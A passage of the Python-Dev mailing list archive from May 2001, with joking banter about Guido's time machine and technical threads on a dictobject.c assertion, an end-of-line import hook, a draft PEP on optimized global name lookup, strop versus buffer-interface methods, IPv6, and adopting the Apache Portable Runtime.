don't want to know what that particular world looked like, but let's just say it involved lots and lots of angry elephants. So now I leave well enough alone, and I've learned that if you really want to change the past, just wait for Guido to use it for his own nefarious purposes, and tape a sign to his back requesting the (very modest) change to the continuum that you're looking for. And don't forget to smear the front of that sign with s'more. -Barry From tim.one at home.com Wed May 23 23:02:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 17:02:17 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. [Tim] > You wouldn't happen to have a reproducible test case? Nevermind; I do: d = {} for i in range(5): d[i] = i for i in range(5): del d[i] for i in range(5, 9): # assert triggers when i == 8 d[i] = i The cure is more complicated than I described, though. From esr at thyrsus.com Thu May 24 00:39:49 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 18:39:49 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523183949.A19251@thyrsus.com> Barry A. Warsaw : > You really don't want to know what that particular world looked like, > but let's just say it involved lots and lots of angry elephants. You've been *there*? Dang...that's the timeline that scared me into hanging up my lab coat. It was a slow Saturday and I was hatching Sinister Plan For World Domination number 4. What happened to the other three? Well...I had been planning to terrorize the western U.S with a giant mechanical spider, until some guys from Hollywood offered me way too much money for it. The trained army of radioactive gorillas I spent the movie money on didn't work out -- my Igor flatly refused to shovel any more radioactive gorilla poop, and you know how hard it is to get good help these days. Blackmailing major cities with a Zeppelin-mounted death ray projector sounded cool but Radio Shack was out of the parts. OK, so plan #4 was to create voracious mega-amoebas using my Ionic Mutatron and send them out to destroy all my enemies, especially that kid who beat me up in third grade. There I was, cackling insanely, just about to unleash these slimy horrors on an unsuspecting world to wreak havoc and destruction, when the eka-rhodium electrodes on the Mutatron arced over. This produced a wild spike of temporokinetic energy, and guess where *I* was standing? Silly me. Before you could say "plot complication" I was materializing in the Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself, as it turned out, who was getting wound up to try out his newest human-goad on a mahout they had just captured from the Fortified Cities. The mahout was terrified out of his wits, and you would have been too if you'd seen what the High Pachyderm's tusks were covered with and the lascivious way his trunk was curled around that cheese grater. Euggghhh... It was crazy. The High Pachyderm was trumpeting like mad, tuskers charging at me from all directions, and me with at least 5.23 seconds to go until the temporokinetic charge wore off. Fortunately I remembered that elephants communicate using modulated infrasonics that they hear with the flat part of their foreheads, and I had my trusty sonic screwdriver on me. I set it to "infra" at maximum volume and hurled it at the High Pachyderm -- hit the bugger right in the tiara. He went berserk and his confused guards started crashing into each other left and right, which was a pretty impressive sight since the smallest of them weighed over two and a half tons. It was touch and go there, let me tell you. I caught one glimpse of the mahout's rapidly-retreating heels just as the charge wore off and I was slingshotted back to my lab. My sonic screwdriver, of course, followed within seconds -- horribly crushed and mangled. And that's when I swore off building fiendish devices. Electrocution I can laugh at, having my monstrous creations turn on me is all in a day's work, and that one time I was accidentally transformed into a fly I found some truly remarkable uses for a three-foot-long prehensile tongue. But what the High Pachyderm had planned was too twisted even for *me*. I decided Sinister Plan #5 would have to be a bit less hardware-intensive, if only as a rest for my frazzled nerves. So I spent the last juice in the batteries on the orbital mind-control lasers (long story) to implant some subtle suggestions in a few minds at Netscape and IBM and elsewhere, and started hitting the conference circuit pretty heavy. What suggestions? Oh, nothing important. Nothing at all...BWAHAHAHAHA!!! -- Eric S. Raymond Sometimes the law defends plunder and participates in it. Sometimes the law places the whole apparatus of judges, police, prisons and gendarmes at the service of the plunderers, and treats the victim -- when he defends himself -- as a criminal. -- Frederic Bastiat, "The Law" From gward at python.net Thu May 24 01:48:10 2001 From: gward at python.net (Greg Ward) Date: Wed, 23 May 2001 19:48:10 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523194810.A9947@gerg.ca> On 23 May 2001, Barry A. Warsaw said: > The second time I used it, I'd forgotten that you must keep your left > hand on the silver sphere while you line up the parallel lines with > the lip-actuated alpha wheel. What? You mean Guido's time machine was really designed by Larry Wall? Oh, the irony... Greg -- Greg Ward - Python bigot gward at python.net http://starship.python.net/~gward/ If you can read this, thank a programmer. From dgoodger at bigfoot.com Thu May 24 03:04:46 2001 From: dgoodger at bigfoot.com (David Goodger) Date: Wed, 23 May 2001 21:04:46 -0400 Subject: [Python-Dev] Re: Import hook to do end-of-line conversion? In-Reply-To: <3B0AF45D.732126E6@home.net> Message-ID: Yesterday I found I had need for an end-of-line conversion import hook. I looked sround but found none (did I miss some code on this thread?), so I whipped one up (below). It seems to do the job. If you see any goofs, gaffes or gotchas, or if you know of a better way to do this, please let me know. I will post this code to c.l.py in a few days for the enjoyment of all. -- David Goodger dgoodger at bigfoot.com Open-source projects: - The Go Tools Project: http://gotools.sourceforge.net - reStructuredText: http://structuredtext.sourceforge.net (soon!) -----%<----------cut----------%<----------%<----------cut----------%<----- # Import hook for end-of-line conversion, # by David Goodger (dgoodger at bigfoot.com). # Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to # import Python modules with any of Unix, Mac, or Windows line endings. import ihooks, imp, py_compile class MyHooks(ihooks.Hooks): def load_source(self, name, filename, file=None): """Compile source files with any line ending.""" if file: file.close() py_compile.compile(filename) # line ending conversion is in here cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb') try: return self.load_compiled(name, filename, cfile) finally: cfile.close() class MyModuleLoader(ihooks.ModuleLoader): def load_module(self, name, stuff): """Special-case package directory imports.""" file, filename, (suff, mode, type) = stuff path = None if type == imp.PKG_DIRECTORY: stuff = self.find_module_in_dir("__init__", filename, 0) file = stuff[0] # package/__init__.py path = [filename] try: # let superclass handle the rest module = ihooks.ModuleLoader.load_module(self, name, stuff) finally: if file: file.close() if path: module.__path__ = path # necessary for pkg.module imports return module ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install() From jeremy at alum.mit.edu Thu May 24 03:10:55 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Wed, 23 May 2001 21:10:55 -0400 (EDT) Subject: [Python-Dev] pre-PEP on optimized global names Message-ID: <200105240110.VAA09078@newman.concentric.net> I've been hoping to work on optimized global and builtin name support for Python 2.2. I'm not sure if I'll have time, but thought I'd circulate a draft with some notes on the subject now. Anyone interested in this work? Jeremy PEP: ??? Title: Optimized Access to Module and Builtin Names Author: jeremy at digicool.com (Jeremy Hylton) Status: Draft Type: Standards Track Python-Version: 2.2 Created: 23-May-2001 Abstract This PEP proposes a new implementation of global module namespaces and the builtin namespace that speeds name resolution. The implementation would use an array of object pointers for most operations in these namespaces. The compiler would assign indices for global variables at compile time. The current implementation represents these namespaces as dictionaries. A global name incurs a dictionary lookup each time it is used; a builtin name incurs two dictionary lookups, a failed lookup in the global namespace and a second lookup in the builtin namespace. This implementation should speed Python code that uses module-level functions and variables. It should also eliminate awkward coding styles that have evolved to speed access to these names. The implementation is complicated because the global and builtin namespaces can be modified dynamically in ways that are impossible for the compiler to detect. (Example: A module's namespace is modified by a script after the module is imported.) As a result, the implementation must maintain several auxillary data structures to preserve these dynamic features. Introduction [expand on the basic ideas in the abstract] [describe the key parts of the design: dlict, compiler support, stupid name trick workarounds, optimization of other module's globals] DLict design The namespaces are implemented using a data structure that has sometimes gone under the name dlict. It is a dictionary that has numbered slots for some dictionary entries. The type must be implemented in C to achieve acceptable performance. A Python implementation is included here to explain the basic design: """A dictionary-list hybrid""" import types class DLict: def __init__(self, names): assert isinstance(names, types.DictType) self.names = {} self.list = [None] * size self.empty = [1] * size self.dict = {} self.size = 0 def __getitem__(self, name): i = self.names.get(name) if i is None: return self.dict[name] if self.empty[i] is not None: raise KeyError, name return self.list[i] def __setitem__(self, name, val): i = self.names.get(name) if i is None: self.dict[name] = val else: self.empty[i] = None self.list[i] = val self.size += 1 def __delitem__(self, name): i = self.names.get(name) if i is None: del self.dict[name] else: if self.empty[i] is not None: raise KeyError, name self.empty[i] = 1 self.list[i] = None self.size -= 1 def keys(self): if self.dict: return self.names.keys() + self.dict.keys() else: return self.names.keys() def values(self): if self.dict: return self.names.values() + self.dict.values() else: return self.names.values() def items(self): if self.dict: return self.names.items() else: return self.names.items() + self.dict.items() def __len__(self): return self.size + len(self.dict) def __cmp__(self, dlict): c = cmp(self.names, dlict.names) if c != 0: return c c = cmp(self.size, dlict.size) if c != 0: return c for i in range(len(self.names)): c = cmp(self.empty[i], dlict.empty[i]) if c != 0: return c if self.empty[i] is None: c = cmp(self.list[i], dlict.empty[i]) if c != 0: return c return cmp(self.dict, dlict.dict) def clear(self): self.dict.clear() for i in range(len(self.names)): if self.empty[i] is None: self.empty[i] = 1 self.list[i] = None def update(self): pass def load(self, index): """dlict-special method to support indexed access""" if self.empty[index] is None: return self.list[index] else: raise KeyError, index # XXX might want reverse mapping def store(self, index, val): """dlict-special method to support indexed access""" self.empty[index] = None self.list[index] = val def delete(self, index): """dlict-special method to support indexed access""" self.empty[index] = 1 self.list[index] = None Compiler issues The compiler currently collects the names of all global variables in a module. These are names bound at the module level or bound in a class or function body that declares them to be global. The compiler would assign indices for each global name and add the names and indices of the globals to the module's code object. Each code object would then be bound irrevocably to the module it was defined in. (Not sure if there are some subtle problems with this.) Enhancement: Optimized access to other module's globals If one module imports another and binds a name in the global namespace, the compiler currently detects that the particular global is bound to a module. The compiler also note access to any attribute of a module, and emit special opcodes for accessing these names. At runtime the implementation can lookup the index of the module attribute in the module's namespace. In the current namespace, a pointer to the foreign module's dlict can be recorded along with the name's offset in the dlict. This would allow names, e.g. types.StringType, to be used with the same efficiency as globals. Backwards compatibility The dlict will need to maintain metainformation about whether a slot is currently used or not. It will also need to maintain a pointer to the builtin namespace. When a name is not currently used in the global namespace, the lookup will have to fail over to the builtin namespace. In the reverse case, each module may need a special accessor function for the builtin namespace that checks to see if a global shadowing the builtin has been added dynamically. This check would only occur if there was a dynamic change to the module's dlict, i.e. when a name is bound that wasn't discovered at compile-time. These mechanisms would have little if any cost for the common case whether a module's global namespace is not modified in strange ways at runtime. They would add overhead for modules that did unusual things with global names, but this is an uncommon practice and probably one worth discouraging. It may be desirable to disable dynamic additions to the global namespace in some future version of Python. If so, the new implementation could provide warnings. Local Variables: mode: indented-text indent-tabs-mode: nil End: From barry at digicool.com Thu May 24 04:46:30 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 22:46:30 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> Message-ID: <15116.30214.900667.624573@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Before you could say "plot complication" I was materializing ESR> in the Hyraxeum -- damn near nose-to-trunk with the High ESR> Pachyderm himself, as it turned out, who was getting wound up ESR> to try out his newest human-goad on a mahout they had just ESR> captured from the Fortified Cities. That big self-important elephant wasn't named Puffy the Frog by any chance, was he? Did he taste vaguely lemony? If so, he's got a lot of nerve calling himself the "High Pachyderm"! Quite a lofty title for one who's skin is stretched to just this side of its tensile breaking point. Sure, I know ol' Puffy, had a few binges with the old goat myself. You just don't want to be near him when the stray micro-meteor happens to pierce his dermis. Much, MUCH messier than eight crates of cornbob filled to the brim with radioactive gorilla poop, I can assure you! now-where'd-i-leave-my-medication?-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:04:58 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:04:58 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> Message-ID: <20010523230458.A28895@thyrsus.com> Barry A. Warsaw : > That big self-important elephant wasn't named Puffy the Frog by any > chance, was he? Did he taste vaguely lemony? If so, he's got a lot > of nerve calling himself the "High Pachyderm"! Quite a lofty title > for one who's skin is stretched to just this side of its tensile > breaking point. Congratulations, Barry. I googled for "Puffy the Frog" and found a page that...explained...this. It was the #1 hit. Apparently the Universe is an even more random place than I thought. -- Eric S. Raymond If I were to select a jack-booted group of fascists who are perhaps as large a danger to American society as I could pick today, I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms]. -- U.S. Representative John Dingell, 1980 From barry at digicool.com Thu May 24 05:14:07 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 23:14:07 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> Message-ID: <15116.31871.122265.883855@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Congratulations, Barry. I googled for "Puffy the Frog" and ESR> found a page that...explained...this. It was the #1 hit. Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass singer in the Atlanta-based band "The Shrinking of George". What you found is no doubt the lyrics to that song, which topped the pop charts briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact), displacing the Beatles "I Wanna Hold Your Head" before being itself displaced by the The Bee Gee's "Booger Feever" [sic]. Sadly, even Napster doesn't have the mp3's and all Dad's old records are scratched beyond hope. ESR> Apparently the Universe is an even more random place than I ESR> thought. here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:31:42 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:31:42 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org> Message-ID: <20010523233142.A29023@thyrsus.com> Barry A. Warsaw : > Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass > singer in the Atlanta-based band "The Shrinking of George". I suppose it's not a coincidence that it's Fernando Poo day today. Of course it's not a coincidence. There are no coincidences anywhere. Fnord. -- Eric S. Raymond Sometimes it is said that man cannot be trusted with the government of himself. Can he, then, be trusted with the government of others? -- Thomas Jefferson, in his 1801 inaugural address From aahz at rahul.net Thu May 24 06:59:37 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 21:59:37 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 23, 2001 03:45:06 PM Message-ID: <20010524045938.5228199C83@waltz.rahul.net> Tim Peters wrote: > [Aahz] >> >> (This got brought up because I experimented with os._exit() as a >> possible solution, but that GPFs on Win98SE.) > > Please open a bug report on that, then, with a tiny test case if possible. > This worked fine on Win98SE for me just now: Futz. *Now* it works. Chalk it up to another unreproducible bug caused by an unstable Win98. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From gstein at lyra.org Thu May 24 10:33:49 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:33:49 -0700 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82 In-Reply-To: ; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700 References: Message-ID: <20010524013349.Y5402@lyra.org> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > Update of /cvsroot/python/python/dist/src/Modules > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > Modified Files: > stropmodule.c > Log Message: > Add warnings to the strop module, for to those functions that really > *are* obsolete; three variables and the maketrans() function are not > (yet) obsolete. > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > Add this to the NEWS. Something that I ran into the other day... >>> ob = some_object_implementing_the_buffer_interface >>> string.find(ob, '.') (fails because ob does not define the .find method) >>> strop.find(ob, '.') (succeeds) The point is that strop uses the t# to get a ptr/len pair to do its work. Thus, it can work on many things that export the buffer interface. Dropping strop means we no longer have many of those functions. Instead, the functionality must be copied to *every* object that implements the buffer interface. We can say ob.find() now, but we can't say find(ob) any longer. And saying that all objects (which implement the buffer API) must now implement a bunch of "standard" methods is awfully burdensome. In my particular case, I was trying to do a find on a BufferObject referring to a subset of another object. Blam. No good. Thankfully, when I did a find() on a mmap object, it worked simply because mmaps happen to define a .find method. [ of course, the find method on an mmap was totally broken, but I checked in a fix for that (last week or so) ] So... my question is: is there any way that we can retain a generic find() (and similar functions from the string/strop module) that operates on any type that implements the buffer API? Maybe there is some way we can do a mixin for Python types? e.g. "this mixin implements some standard methods for 8-bit character data (using the buffer API), which can be mixed into new Python types" That would reduce the burden for new types. Thoughts? Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 10:52:58 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:52:58 -0700 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400 References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <20010524015258.Z5402@lyra.org> On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote: > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) Radical suggestion: Toss out a ton of the platform-specific stuff in Python and use the Apache Portable Runtime (APR). It has IPv6 in it, but it could also help with loading shared libraries, threading, mmap'd files, sockets, etc. (it won't replace *all* of Python's platform specific stuff; I think Python has more coverage than APR does) Could simplify a number of things for Python, and reduce some of the maintenance costs... Cheers, -g -- Greg Stein, http://www.lyra.org/ From thomas at xs4all.net Thu May 24 11:01:52 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 11:01:52 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010524110152.Q676@xs4all.nl> [ Answer CC'd to python-dev since it deserves an official answer :) ] On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote: > For summarasing purposes, do you have any idea when Python 2.1.1 will > be released? > "No" is a perfectly acceptable answer. Then "No" it is ! Even though I have a fair bit of patches in the queue right now, I need some more time to check out (no pun intended) the changes since the fork, and I want to browse the bug list for possible bugs that should be checked out and fixed for 2.1.1. Another couple of weeks at least, before a release candidate. It also depends on Moshe; if he actually releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Thu May 24 12:18:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 12:18:50 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> Message-ID: <3B0CE00A.488C8D73@lemburg.com> Greg Stein wrote: > > On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > > Update of /cvsroot/python/python/dist/src/Modules > > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > > > Modified Files: > > stropmodule.c > > Log Message: > > Add warnings to the strop module, for to those functions that really > > *are* obsolete; three variables and the maketrans() function are not > > (yet) obsolete. > > > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > > > Add this to the NEWS. > > Something that I ran into the other day... > > >>> ob = some_object_implementing_the_buffer_interface > >>> string.find(ob, '.') > (fails because ob does not define the .find method) > >>> strop.find(ob, '.') > (succeeds) > > The point is that strop uses the t# to get a ptr/len pair to do its work. > Thus, it can work on many things that export the buffer interface. Dropping > strop means we no longer have many of those functions. Instead, the > functionality must be copied to *every* object that implements the buffer > interface. > > We can say ob.find() now, but we can't say find(ob) any longer. And saying > that all objects (which implement the buffer API) must now implement a bunch > of "standard" methods is awfully burdensome. > > In my particular case, I was trying to do a find on a BufferObject referring > to a subset of another object. Blam. No good. Thankfully, when I did a > find() on a mmap object, it worked simply because mmaps happen to define a > .find method. > > [ of course, the find method on an mmap was totally broken, but I checked in > a fix for that (last week or so) ] > > So... my question is: is there any way that we can retain a generic find() > (and similar functions from the string/strop module) that operates on any > type that implements the buffer API? > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > implements some standard methods for 8-bit character data (using the buffer > API), which can be mixed into new Python types" That would reduce the burden > for new types. I suppose that in 2.2 we'll be able to build a class/type hierarchy which then provides these possibilities. I haven't followed Guido's latest checkins closely though -- could be that types don't support multiple inheritence. BTW, wouldn't it suffice to add these methods to buffer objects ? Then you could write: buffer(ob).find('.'). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 24 13:50:34 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 24 May 2001 07:50:34 -0400 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> Message-ID: <15116.62858.720241.46017@anthem.wooz.org> >>>>> "GS" == Greg Stein writes: GS> Toss out a ton of the platform-specific stuff in Python and GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but GS> it could also help with loading shared libraries, threading, GS> mmap'd files, sockets, etc. I don't know squat about APR, but would it have to be either-or? IOW, would it be possible to wrap the APR in a module (or package) and provide it as an importable alternative? -Barry From mal at lemburg.com Thu May 24 14:22:42 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 14:22:42 +0200 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> Message-ID: <3B0CFD12.164271D8@lemburg.com> "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > GS> Toss out a ton of the platform-specific stuff in Python and > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > GS> it could also help with loading shared libraries, threading, > GS> mmap'd files, sockets, etc. > > I don't know squat about APR, but would it have to be either-or? IOW, > would it be possible to wrap the APR in a module (or package) and > provide it as an importable alternative? Should be possible; the problem is: how do you get the APR types to interact with the original Python ones (e.g. file types). Many low-level Python functions require the native Python types, so while wrapping APR as Python module would provide an alternative, that alternative will most probably not help much w/r to simplifying portability issues. FYI, here's what the APR has to offer (taken from the APRDesign file that comes with Apache 2.0 beta): """ The base types in APR file_io File I/O, including pipes lib A portable library originally used in Apache. This contains memory management, tables, and arrays. locks Mutex and reader/writer locks misc Any APR type which doesn't have any other place to belong network_io Network I/O shmem Shared Memory (Not currently implemented) signal Asynchronous Signals threadproc Threads and Processes time Time """ It currently supports: Unix (includes BeOS), Win32 and OS/2. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gstein at lyra.org Thu May 24 14:55:55 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 05:55:55 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com> Message-ID: <20010524055555.B5402@lyra.org> On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote: > "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > > > GS> Toss out a ton of the platform-specific stuff in Python and > > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > > GS> it could also help with loading shared libraries, threading, > > GS> mmap'd files, sockets, etc. > > > > I don't know squat about APR, but would it have to be either-or? IOW, > > would it be possible to wrap the APR in a module (or package) and > > provide it as an importable alternative? Sure, that is a possibility, but it doesn't save Python much in terms of maintenance or portability. "Just another library" Truly using it could certainly be done as a slow migration, and it is definitely possible to only use portions, subsets, etc. Another alternative would be to use APR as a "platform target". But that just adds yet another platform to support rather than simplifying. > Should be possible; the problem is: how do you get the APR types > to interact with the original Python ones (e.g. file types). Many The header is a total misnomer, but "apr_portable.h" provides access to an opaque type's underlying native object (many of us aren't sure how Ryan arrived at "portable" being the name for the least-portable aspect of the library :-). Anyways... you can extract a file descriptor from a file or socket or pipe. Or a thread ID from an thread object. etc. > low-level Python functions require the native Python types, so > while wrapping APR as Python module would provide an alternative, that > alternative will most probably not help much w/r to simplifying > portability issues. Right. I'd say use the APR functions unless absolute speed is required (such as the readlines stuff). But you could also argue that the hard-core platform specific optimizations could go into APR itself, so that Python doesn't have to worry about them. > FYI, here's what the APR has to offer (taken from the APRDesign > file that comes with Apache 2.0 beta): > """ > The base types in APR > file_io File I/O, including pipes > lib A portable library originally used in Apache. This contains > memory management, tables, and arrays. > locks Mutex and reader/writer locks > misc Any APR type which doesn't have any other place to belong > network_io Network I/O > shmem Shared Memory (Not currently implemented) > signal Asynchronous Signals > threadproc Threads and Processes > time Time > """ That doc is out of date; the list is missing: shared library handling, i18n, mmap, user information access (e.g. getpwnam), uuid handling, getopt replacements, cryptographic random data, and a few other bits here and there. The shared mem actually is implemented mostly, via the libmm library. And note that some of those topics have some nice depth. As I mentioned, network_io supports IPv6, but also portable name lookups, sendfile(), etc. The file_io stuff support optimized stat() and opendir-type calls for the platform. > It currently supports: Unix (includes BeOS), Win32 and OS/2. A lot more than that :-) Pretty much all the Unix variants, including OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 15:00:16 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:00:16 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> Message-ID: <20010524060016.D5402@lyra.org> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > Greg Stein wrote: >... > > So... my question is: is there any way that we can retain a generic find() > > (and similar functions from the string/strop module) that operates on any > > type that implements the buffer API? > > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > implements some standard methods for 8-bit character data (using the buffer > > API), which can be mixed into new Python types" That would reduce the burden > > for new types. > > I suppose that in 2.2 we'll be able to build a class/type > hierarchy which then provides these possibilities. I haven't > followed Guido's latest checkins closely though -- could be that > types don't support multiple inheritence. No idea either... that's why I asked. > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). You're totally missing the point with that suggestion. It does *not* suffice to add them to buffer objects. What about array objects? mmap objects? Random Joe Object who implements the buffer interface? All of those are out of luck. With strop, I can pass any of those objects to strop.find(). That function has a polymorphic argument. In the current arrangement, every object must implement their own .find and .upper and .whatever. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mwh at python.net Thu May 24 15:02:34 2001 From: mwh at python.net (Michael Hudson) Date: Thu, 24 May 2001 14:02:34 +0100 (BST) Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <20010524055555.B5402@lyra.org> Message-ID: I can't think of a good way of expressing this, but I don't think we should try to make writing non cross-platform code in Python impossible. Yes, it should be easy to write x-platform code, but if there's some very specific platform trick I can do with, say, setsockopt, I don't want Python to hide it from me just 'cause it doesn't work on VMS. Maybe this isn't an issue here. On Thu, 24 May 2001, Greg Stein wrote: [...] > That doc is out of date; the list is missing: shared library handling, i18n, > mmap, user information access (e.g. getpwnam), uuid handling, getopt > replacements, cryptographic random data, and a few other bits here and > there. The shared mem actually is implemented mostly, via the libmm library. How big is APR? How stable? (in terms of interface; I'm assuming it doesn't crap out through bad programming or it'd be a non-starter) > And note that some of those topics have some nice depth. As I mentioned, > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > The file_io stuff support optimized stat() and opendir-type calls for the > platform. > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > A lot more than that :-) Pretty much all the Unix variants, including > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. That's still less than Python isn't it? RiscOS, 